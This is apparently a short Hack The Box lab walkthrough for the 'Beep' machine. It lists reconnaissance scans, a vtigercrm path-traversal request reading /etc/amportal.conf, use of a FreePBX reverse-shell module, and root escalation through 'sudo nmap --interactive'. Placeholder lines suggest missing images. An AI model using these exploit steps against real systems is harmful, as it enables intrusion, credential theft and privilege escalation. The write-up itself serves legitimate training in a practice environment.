Beep

Beep


HTB Linux

echo “10.129.1.226 beep.htb” | sudo tee -a /etc/hosts

nmap -A -p- -oA output 10.129.1.226 —min-rate=10000 —script=vuln —script-timeout=15 -v

nmap -T4 -oA output 10.129.1.226 —script=vuln -v

nmap -sT -sV -sC -Pn -p- 10.129.1.226

nikto -h 10.129.1.226:80

gobuster dir -u http://10.129.1.226 -w /usr/share/dirb/wordlists/big.txt -t 20

ssh_command.

curl -k “http://beep.htb/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

https://10.129.1.226/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

ssh_command.

https://github.com/SamSepiolProxy/FreePBX-Reverse-Shell-Module

ssh_command.

git clone https://github.com/SamSepiolProxy/FreePBX-Reverse-Shell-Module 130 ⨯ cd FreePBX-Reverse-Shell-Module vim shell/install.php tar -cvzf shell-1.0.tar.gz shell

ssh_command.

ssh_command.

ssh_command.

Click on process and then confirm

ssh_command.

ssh_command.

sh-3.2$ sudo -l sh-3.2$ sudo nmap —interactive nmap> !sh python -c “import pty; pty.spawn(‘/bin/bash’)”

ssh_command.

© 2025 Cu3rv0x